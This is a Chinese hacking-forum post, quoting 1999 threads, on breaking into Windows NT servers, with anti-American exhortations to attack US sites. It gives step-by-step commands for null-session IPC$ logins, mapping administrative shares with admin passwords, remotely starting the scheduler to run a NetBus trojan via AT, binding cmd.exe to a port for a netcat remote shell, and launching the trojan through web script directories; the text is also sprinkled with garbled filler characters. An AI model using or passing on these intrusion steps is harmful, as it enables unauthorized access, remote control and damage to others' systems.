找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:
/ i& z; Y( s" c1 C, L/ G请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。. E, ~, Y8 I' S- v# ~
> 我的机子MMX166,WIN98,2。5G,32M内存。
4 q% X9 @( w- X0 A! h
# R# d" \# S7 o/ F黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。. S( N/ S4 d$ s9 L" E
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。2 l& p% `  S5 \3 C4 Y
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
" U, H) Y5 O) j* L9 C8 snet use \\111.111.111.111\ipc$ "" /user:""
3 z* ?3 H- b7 Z0 i& q% Xnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
. l" o6 B, I, T+ o" |% v. B9 knet view \\111.111.111.111
9 \/ Y( i3 O* `5 |* v0 r6 Z  L) p当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
( W: ^  A. m8 T1 U) n; e8 y  Fnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
4 R; y: e% P% D% F. N. u* Q* O命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:: k8 w/ M+ t6 Y- n5 _4 I
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
) S1 [. e1 ]2 o2 T3 \, `net use x: \\111.111.111.111\c$
$ W+ B/ ]: n. b8 M5 p. onet use y: \\111.111.111.111\d$* ~. e9 r' z0 B* ~
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...9 U8 l+ c1 I. }0 f) @! }
2、管理目标NT的用户:
" T: g9 O4 [* ?3 y3 O5 }- j从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”% s' d2 r- w7 k/ X. c* [
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
) G1 W1 h4 F& m- }+ N6 S3、管理目标NT的服务
$ K( k" |( m9 w9 M选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”6 _. E% W* R. H
这样你可以管理目标NT上的服务,共享目录
. g/ L0 T, U& O- d4、IIS管理7 ?$ q1 X: I% ?, E* `' U8 l; X5 [- c
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
3 m  V4 H$ V/ |4 w目标NT的FTP、WWW服务你就可以重新配置
5 t6 N+ N1 H* J- g% k! N2 Z. j& y8 ~5、事件管理  K% i  ]& f; l- v# N; n
“事件查看器”->连接到服务器->111.111.111.111
  b5 e/ f0 D; z
6 N  z5 l1 O+ @- {5 Q还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
4 b$ B9 G8 a& {" V' m% i
% Z5 t' T: C* {+ n3 b% ^8 b当然,98,95也能做一些事情,但很麻烦,比如:
  ^( o% u8 P$ Mnet use \\111.111.111.111\ipc$' \$ U2 p/ ~4 b! C* i
net use z: \\111.111.111.111\d$) j; }+ b& I5 M4 y3 y" ?0 t
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
; K( f2 N0 U# \7 U
& c1 ?3 g- |$ {, M; T6 H我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!( L# [" `3 o4 {8 m) G' Y( _  z; m
这样,你还可以了解目标机器上能有什么东东供你去用!
+ i) Z! L& g; p# r. Q2 }
, J- x3 S" t3 S) A7 f) w$ h. d4 e  @, F
--------------------------------------------------------------------------------
" y8 W, ?; G& C% c  F
+ g0 U4 Z3 L: }& j>quack于1999-06-12,23:37:449 J, ~1 Q9 N, x
在大作《几个有关黑的问题》中提到:/ g; t, e5 E; ]2 L9 \
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
5 P8 n. `2 q; `; W# w" R& v7 l9 M4 y6 |" M/ _
killusa于1999-06-13,03:25:15/ I# Z+ `# U0 F4 a, Z: ^
在大作《Re: 几个有关黑的问题》中提到:0 r* o5 H- D: f4 p" ]3 a

8 ^: W4 n1 x' f+ h8 c7 M0 xletmein.exe 暂时没有mypwd参数,十分抱歉
& ?" j& `6 B! `  @. ~1 Y) B" A; ]pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。& n$ m) R& b4 l5 z
. k& B( k/ x2 k7 U" K' C+ g3 z
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的! h" @4 W+ J, a
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
0 ?- l% M2 d/ U3 b
' x" g$ z% N0 u- O# q: @1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
+ k4 `/ S4 H" w+ i# [1 b$ g3 r, F7 o0 K2 p3 o" R# [
C:\>net start schedule9 t+ l# u9 V: N, x- [* Z6 x9 d9 t
Schedule 正在启动服务.....
2 ^: l' Q  t4 `. }Schedulw 服务启动成功。
# f# r9 T+ U, hC:\>at /?
  f; G5 q: j& W5 w% e+ P8 LAT 命令排定在特定的日期和时间运行某些命令和程序。' c; f: n& [! v6 ~& g. k. A
运行 AT 命令之前必须先启动 Schedule 服务。1 m- X- J4 k- m. n

% @7 T! x) n5 k: [AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
4 }, B) F4 N! O3 {AT [\\computername] time [/INTERACTIVE]
' v( U* n, W, l& d) q[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
( S* E) s* L1 X* z" ^$ v+ j0 i2 c7 V
\\computername 指定远程计算机。 如果省略这个参数
3 m6 W7 s8 d: t& U" Y9 y) G; S- E命令会被排定在本机上运行。- ~& `/ \" H- p* B: `% |& m1 S
id 指定给排定进度命令的识别号。
$ }- h2 g$ L$ c0 G! n- ^
3 P" O0 g2 t% X3 o- @0 e/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。3 c* u) q/ Q9 l; I
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。* W4 Z% \5 o0 G# b7 u/ e6 a
time 指定命令运行的时间。- J+ H# K% G! C0 i
/interactive 允许作业在运行时,与用户通过桌面交互。
0 n9 W2 K: d) Z- g" F: K! A! D' |3 f: M1 v$ O1 F
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
- z2 y. Q1 i* d; r5 n9 P如果省略日期,则默认为在每月的本日运行。
" I: ]' K. q; \: e6 V- ^1 G* p$ A/ L" }5 ]; z" X% k/ [
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。  h# c/ ?4 r6 I, ~3 n! Z& t' b
; @2 S1 H. @% e) c$ b) v: E
"command" 准备运行的 Windows NT 命令或批处理文件。7 N/ R9 F! A* r2 a7 F  K

) x: N+ O2 A  `. c1 PC:\>
8 _1 C5 z  i- f8 t( T. ?7 h% _: N* z. h- D7 Q- A
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:; ?/ b2 C% B3 N* `: S
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"+ ~$ j7 K( o: P( T  N. q  ~, P
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
) M) ^4 a* d* M. ^5 j) }3 t9 W3 p3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
( C4 U; B! _, k+ w' s- P  S8 `at \\x.x.x.x 00:00 ntsrv.exe /port:64321
0 s' {6 w- R& g2 H7 V其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
1 A6 b0 H, c8 O) k9 OMicrosoft(R) Windows NT(TM)
8 D# h9 p2 S) B6 g, B* n(C) Copyright 1985-1996 Microsoft Corp.6 |; K/ z! z$ d* J
C:\>2 `2 r8 y$ i: \

. Z+ f0 P" p4 R2、利用web启动ntsrv.exe或其他程序在目的服务器0 N+ ?; z2 k! x  V
4 S1 f% k& I+ l- ?7 G
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
4 D" M$ i9 _1 G, z5 b! ehttp://x.x.x.x/scripts/ntsrv.exe /port:643213 c+ p8 ], n$ `1 l1 H
http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321/ M0 \3 z: h. L+ k9 Y5 c$ A& z* d+ R- G
该程序就启动了: R& p( I/ v7 U  \

6 ^, s3 T5 Z4 j3 N/ v9 i我只提这几中方法!
8 U3 Q+ \4 n: G5 v0 s, a要成功,必须打好基础工,对操作系统充分了解!
( B/ ?3 _# N# X8 A) ^8 x* }8 R3 Q0 o* a
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-4-30 19:03

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表